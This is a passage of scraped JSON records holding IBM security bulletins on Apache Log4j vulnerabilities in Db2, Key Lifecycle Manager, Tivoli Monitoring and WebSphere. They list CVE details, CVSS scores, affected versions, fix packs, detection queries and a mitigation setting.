vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-45046, CVE-2021-45105\$\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \$CVE-2021-44228\$\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Updated with links to related Log4j bulletins \n08 Mar 2022: Updated to the correct link for Linux 64-bit, POWER little endian \n24 Feb 2022: Added workaround note regarding removing log4j files when on a Unix-type system and Federation wrappers are not being used. \n02 Feb 2022: Clarified versions impacted \n28 Jan 2022: Added a clarification for releases not impacted. \n24 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:14:24", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:14:24", "id": "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "href": "https://www.ibm.com/support/pages/node/6549888", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:39:36", "description": "## Summary\n\nMultiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832). The fix addresses the vulnerability by removing Apache Log4j.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customers with support extension.\n\n## Remediation/Fixes\n\nDepending on your SKLM/GKLM version, see the relevant instructions:\n\n * SKLM 3.0, 3.0.1, and 4.0\n * GKLM 4.1\n * GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1, 4.0\n\n\\- _Also applicable for SKLM 2.7 (**only for customers with a support extension contract**)._\n\n**Required step: Apply WAS fix pack** \nApply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1\n\n**Required step: Apply WAS fix pack and GKLM fix pack**\n\n 1. Apply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n 2. Apply [GKLM 4.1.0 FP4](<https://www.ibm.com/support/pages/node/6552274>). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral> \"Fix Central\" ). \n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.1\n\nThe issues are fixed in [GKLM 4.1.1 - Fix Pack 3](<https://www.ibm.com/support/pages/node/6529054> \"GKLM 4.1.1 - Fix Pack 3\" ). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T12:55:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T12:55:51", "id": "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "href": "https://www.ibm.com/support/pages/node/6539408", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-30T21:29:03", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTFXA\",\"label\":\"Tivoli Monitoring\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.3.0.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-12-30T17:31:59", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T17:27:41", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 for bulletins relating to Log4j V2. Updating log4j to a version 2.15.0 or higher also addresses CVE-2021-4104.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured: \n\n\nFederation: \n\n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| \n\nIT39389\n\n| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A980553972695302272&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| \n\nIT39389\n\n| \n\n<https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nA user with SYSADM authority should preform the following:\n\ndb2stop\n\ndb2set DB2_JVM_STARTARGS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\ndb2start\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-4104\$\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\$CVE-2021-44832\$\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \$CVE-2021-45046, CVE-2021-45105\$\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Updated related links for other Log4j bulletins. \n21 Dec 2021: Links for 11.5.7 Windows 32-bit and Windows 64-bit have been added \n20 Dec 2021: Links for 11.5.6 Windows 32-bit and Windows 64-bit have been added \n16 Dec 2021: Updated to reflect that all Db2 editions are impacted. Added instructions to determine if Federation is enabled. \n16 Dec 2021: Added fix pack links for 11.5.7 special builds on AIX 64-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian \n15 Dec 2021: Added fix pack links for 11.5.6 special builds on AIX 64-bit, Linux 32-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \nAdded fix pack links for 11.5.7 special builds on Linux 32-bit, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:17:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:17:23", "id": "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "href": "https://www.ibm.com/support/pages/node/6526462", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:39:26", "description": "## Summary\n\nWebSphere Application Server (WAS) is shipped as a component of IBM Security Guardium Key Lifecycle Manager (GKLM). Information about the Apache Log4j vulnerability has been published in a security bulletin. Customers are encouraged to take quick action to update their systems.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n\n\n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted 